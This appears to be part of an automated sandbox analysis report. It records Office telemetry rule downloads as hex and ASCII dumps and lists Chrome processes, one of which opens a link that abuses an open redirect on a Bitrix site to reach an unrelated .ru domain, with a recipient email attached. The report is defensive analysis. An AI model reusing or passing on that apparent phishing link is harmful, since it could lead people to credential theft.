                                                  2024-12-09 08:35:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  79192.168.2.44984613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:44 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:44 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B989EE75B"
                                                  x-ms-request-id: 32c7c32d-b01e-003e-2b01-488e41000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083544Z-r1cf579d778t5c2lhC1EWRce3w00000008hg0000000038xq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:45 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  80192.168.2.44984713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:44 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: 15edef34-f01e-0020-0f44-49956b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083545Z-r1cf579d778w59f9hC1EWRze6w0000000850000000002f48
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:45 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  81192.168.2.44984813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:44 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97E6FCDD"
                                                  x-ms-request-id: 45682ef5-801e-0048-7703-48f3fb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083545Z-r1cf579d7789trgthC1EWRkkfc00000008k0000000002c95
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:45 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  82192.168.2.44984913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:45 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:46 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:46 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C710B28"
                                                  x-ms-request-id: a7f5343d-701e-001e-5304-48f5e6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083546Z-r1cf579d778qgtz2hC1EWRmgks00000007n00000000046sb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  83192.168.2.44985013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:46 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:46 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                  ETag: "0x8DC582BA54DCC28"
                                                  x-ms-request-id: b6d54f7b-d01e-0066-034b-49ea17000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083546Z-r1cf579d7782v2q5hC1EWRt9bw00000002m00000000034y7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:47 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  84192.168.2.44985113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:46 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7F164C3"
                                                  x-ms-request-id: 49c2372f-d01e-0065-7b09-48b77a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083547Z-r1cf579d7788pwqzhC1EWRrpd80000000860000000001b8h
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  85192.168.2.44985213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:46 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                  ETag: "0x8DC582BA48B5BDD"
                                                  x-ms-request-id: 704c87bc-501e-00a0-2501-489d9f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083547Z-r1cf579d7786c2tshC1EWRr1gc00000007e0000000004cnq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:47 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  86192.168.2.44985313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:46 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                  ETag: "0x8DC582B9FF95F80"
                                                  x-ms-request-id: a75b6259-601e-0084-3701-486b3f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083547Z-r1cf579d7788pwqzhC1EWRrpd80000000830000000003zvw
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  87192.168.2.44985413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:47 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:03:34:20
                                                  Start date:09/12/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:03:34:24
                                                  Start date:09/12/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2000,i,6516994381047898085,9039193171606525474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:03:34:30
                                                  Start date:09/12/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com"
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  No disassembly